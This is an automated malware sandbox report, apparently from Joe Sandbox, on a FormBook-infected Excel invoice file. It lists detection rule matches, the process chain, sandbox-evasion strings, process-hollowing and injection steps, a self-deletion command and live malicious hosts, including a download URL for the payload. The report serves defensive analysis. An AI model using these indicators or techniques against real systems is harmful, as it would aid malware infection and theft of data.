          Source: 00000007.00000002.2375232552.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2375232552.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: svchost[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000006.00000000.2180707596.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/6@8/7
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$0113 INV_PAK.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR702.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 0113 INV_PAK.xlsxReversingLabs: Detection: 21%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: 0113 INV_PAK.xlsxStatic file information: File size 2298880 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, help.exe
          Source: Binary string: help.pdb source: vbc.exe, 00000005.00000002.2218383792.0000000000769000.00000004.00000020.sdmp
          Source: 0113 INV_PAK.xlsxInitial sample: OLE indicators vbamacros = False
          Source: 0113 INV_PAK.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00327827 push esp; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0032742B push eax; iretd
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0032740A push esi; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00416A29 push cs; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415B33 push 104AF160h; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3B5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B46C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B402 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B40B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BD9D push esi; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B4DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0096DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009B40B push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009B402 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009B46C push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00096A29 push cs; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00095B33 push 104AF160h; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.63729339477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: 0113 INV_PAK.xlsxStream path 'EncryptedPackage' entropy: 7.9999064044 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000004.00000002.2165883965.0000000002301000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2165883965.0000000002301000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.2165883965.0000000002301000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088B0 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1916Thread sleep time: -240000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2724Thread sleep time: -49328s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2776Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1360Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 1688Thread sleep time: -32000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: explorer.exe, 00000006.00000000.2181668566.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.2169394323.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.2165883965.0000000002301000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.2181744057.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2165883965.0000000002301000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.2181278675.00000000041AD000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2165883965.0000000002301000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000006.00000000.2169437204.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: vbc.exe, 00000004.00000002.2165883965.0000000002301000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088B0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B20 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B526F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00950080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009500EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009726F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 154.196.151.25 80
          Source: C:\Windows\explorer.exeNetwork Connect: 166.62.29.42 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.35.76 80
          Source: C:\Windows\explorer.exeNetwork Connect: 44.240.171.172 80
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: ED0000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000000.2169698858.00000000006F0000.00000002.00000001.sdmp, help.exe, 00000007.00000002.2376494354.0000000002F60000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2169698858.00000000006F0000.00000002.00000001.sdmp, help.exe, 00000007.00000002.2376494354.0000000002F60000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2169394323.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2169698858.00000000006F0000.00000002.00000001.sdmp, help.exe, 00000007.00000002.2376494354.0000000002F60000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2218235916.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218311056.0000000000330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375584892.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218333156.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375310907.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2166013985.0000000003308000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375232552.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2218235916.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218311056.0000000000330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375584892.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218333156.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375310907.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2166013985.0000000003308000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375232552.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 344804 Sample: 0113 INV_PAK.xlsx Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 52 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 15 other signatures 2->58 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 37 17 2->15         started        process3 dnsIp4 44 sndychnesqudusissnvx.dns.army 103.141.138.125, 49165, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->44 32 C:\Users\user\AppData\...\svchost[1].exe, PE32 10->32 dropped 34 C:\Users\Public\vbc.exe, PE32 10->34 dropped 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->76 17 vbc.exe 10->17         started        36 C:\Users\user\Desktop\~$0113 INV_PAK.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 46 Machine Learning detection for dropped file 17->46 48 Tries to detect virtualization through RDTSC time measurements 17->48 50 Injects a PE file into a foreign processes 17->50 20 vbc.exe 17->20         started        process9 signatures10 60 Modifies the context of a thread in another process (thread injection) 20->60 62 Maps a DLL or memory area into another process 20->62 64 Sample uses process hollowing technique 20->64 66 Queues an APC in another process (thread injection) 20->66 23 explorer.exe 20->23 injected process11 dnsIp12 38 shuhan.design 192.185.35.76, 49169, 80 UNIFIEDLAYER-AS-1US United States 23->38 40 www.rentfs.com 154.196.151.25, 49170, 80 HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK Seychelles 23->40 42 9 other IPs or domains 23->42 68 System process connects to network (likely due to code injection or exploit) 23->68 27 help.exe 23->27         started        signatures13 process14 signatures15 70 Modifies the context of a thread in another process (thread injection) 27->70 72 Maps a DLL or memory area into another process 27->72 74 Tries to detect virtualization through RDTSC time measurements 27->74 30 cmd.exe 27->30         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          0113 INV_PAK.xlsx22%ReversingLabsDocument-Office.Exploit.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe100%Joe Sandbox ML
          C:\Users\Public\vbc.exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          inreachpt.com0%VirustotalBrowse
          sndychnesqudusissnvx.dns.army4%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://sndychnesqudusissnvx.dns.army/documengt/svchost.exe100%Avira URL Cloudmalware
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
